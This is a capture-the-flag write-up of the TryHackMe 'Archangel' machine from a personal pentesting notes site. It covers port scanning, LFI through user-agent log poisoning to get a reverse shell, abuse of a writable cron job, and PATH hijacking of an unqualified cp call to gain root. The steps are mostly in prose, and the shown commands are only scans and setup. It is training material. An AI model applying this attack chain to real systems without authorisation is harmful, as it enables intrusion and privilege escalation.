GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  • Lab Setup
  • Enumeration
  • Exploitation
  • Privilege Escalation
  1. TryHackMe Writeups

Archangel

PreviousUndiscoveredNextJason

Last updated 1 year ago

Lab Setup

mkdir ~/Documents/TryHackMe/archangel
cd ~/Documents/TryHackMe/archangel
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}

export IP=10.10.8.234

Enumeration

First let's scan the machine for open ports. I usually do this with nmap You need to run this command as root.

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

This will take a while so I use rustscan to make a quick scan.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Found a domain -> mafialive.thm

If you solve the requirements in order this machine is quite easy to solve. Let's change the /etc/hosts file and add our domain.

Next step I enumerate the domain that I found using dirsearch and feroxbuster. Also I do a subdomain enumeration using wfuzz.

As I said all you need to do is to enumerate in the order that the req are asking you. So if you access test.php and try some LFI payloads you will get some answers.

Now let's get access using some LFI2RCE techniques, but first I will restart the machine because with fuzzing I generate a lot of logs and the content is to large and I like it to be easy to read.

So it is about user-agent. Let's exploit this by inject a payload in the user-agent.

Exploitation

After this go to website and refresh the page with logs and you will get a reverse shell. Don't forget to open a listener. I don't put the flags here, try to do the machine on your own.

Privilege Escalation

After some minutes of enumeration I found an interesting file in /opt directory. This file can modified by everyone and also it is executed every minute by archangel user.

As you see I try some payload, but the last one worked and now I am archangel user. Now lets get root privilege.

After a while I get root access. I found an ELF file (backup). Analyze this file and you will see that executes the following command.

cp /home/user/archangel/myfiles/* /opt/backupfiles

Cp command is executed without absolute path (/bin/cp), so you can exploit this. Make an executable file named cp in home directory of archangel and change the path variable and you will get root access.